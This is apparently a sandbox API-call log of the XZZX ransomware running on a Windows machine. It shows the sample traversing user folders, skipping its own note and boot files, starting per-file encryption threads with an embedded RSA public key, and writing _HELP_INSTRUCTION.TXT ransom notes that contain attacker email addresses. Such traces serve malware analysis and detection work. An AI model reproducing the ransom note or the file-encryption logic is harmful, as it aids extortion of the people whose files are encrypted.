lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0239.653] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0239.653] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0239.653] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0239.653] SetErrorMode (uMode=0x1) returned 0x1 [0239.653] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT") returned 74 [0239.653] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0239.654] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0239.654] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x126c) returned 0x0 [0239.654] RegQueryValueExW (in: hKey=0x126c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dc3b0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43dc3b0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0239.654] RegCloseKey (hKey=0x126c) returned 0x0 [0239.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0239.654] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0239.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x126c [0239.654] CloseHandle (hObject=0x126c) returned 1 [0239.654] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0239.654] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="Windows Live" [0239.655] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0239.655] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0239.655] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0239.655] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0239.655] SetErrorMode (uMode=0x1) returned 0x1 [0239.655] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0239.655] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0239.655] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0239.655] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0239.655] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0239.655] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="Links" [0239.655] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0239.655] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0239.655] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="ntldr") returned 0x0 [0239.655] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="NTLDR") returned 0x0 [0239.655] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0239.655] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="ntdetect.com") returned 0x0 [0239.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0239.655] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0239.655] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0239.655] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.655] lstrcpyW (in: lpString1=0x17cf1c, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0239.655] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0239.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1274 [0239.656] Sleep (dwMilliseconds=0x96) [0239.808] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0239.808] lstrcmpW (lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpString2="..") returned 1 [0239.808] lstrcmpW (lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpString2=".") returned 1 [0239.808] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0239.808] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="ntldr") returned 0x0 [0239.808] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="NTLDR") returned 0x0 [0239.809] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0239.809] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="ntdetect.com") returned 0x0 [0239.809] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0239.809] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0239.809] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0239.809] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.809] lstrcpyW (in: lpString1=0x17cf1c, lpString2="323285543E8B2CB8C06CF7B742AC1100.XZZX" | out: lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX") returned="323285543E8B2CB8C06CF7B742AC1100.XZZX" [0239.809] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0239.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1278 [0239.809] Sleep (dwMilliseconds=0x96) [0239.964] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0239.965] lstrcmpW (lpString1="61C67744188385C0EADA50E91CF06A08.XZZX", lpString2="..") returned 1 [0239.965] lstrcmpW (lpString1="61C67744188385C0EADA50E91CF06A08.XZZX", lpString2=".") returned 1 [0239.965] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0239.965] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="ntldr") returned 0x0 [0239.965] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="NTLDR") returned 0x0 [0239.965] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0239.965] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="ntdetect.com") returned 0x0 [0239.965] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0239.965] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0239.965] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0239.965] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.965] lstrcpyW (in: lpString1=0x17cf1c, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0239.965] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0239.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x127c [0239.965] Sleep (dwMilliseconds=0x96) [0240.120] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0240.120] lstrcmpW (lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpString2="..") returned 1 [0240.121] lstrcmpW (lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpString2=".") returned 1 [0240.121] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0240.121] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="ntldr") returned 0x0 [0240.121] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="NTLDR") returned 0x0 [0240.121] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0240.121] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="ntdetect.com") returned 0x0 [0240.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0240.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0240.121] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0240.121] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.121] lstrcpyW (in: lpString1=0x17cf1c, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0240.121] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0240.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1280 [0240.121] Sleep (dwMilliseconds=0x96) [0240.277] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0240.277] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0240.277] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0240.277] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0240.277] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0240.277] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0240.277] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0240.277] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0240.277] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0240.277] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0240.277] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0240.277] SetErrorMode (uMode=0x1) returned 0x1 [0240.277] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT") returned 57 [0240.277] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0240.277] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0240.278] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1284) returned 0x0 [0240.278] RegQueryValueExW (in: hKey=0x1284, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dc5e0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dc5e0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0240.278] RegCloseKey (hKey=0x1284) returned 0x0 [0240.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0240.278] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0240.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1284 [0240.278] CloseHandle (hObject=0x1284) returned 1 [0240.278] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0240.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="Links" [0240.278] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0240.278] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0240.278] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0240.278] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0240.278] SetErrorMode (uMode=0x1) returned 0x1 [0240.278] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0240.278] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0240.278] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0240.278] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0240.278] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0240.279] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0240.279] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" 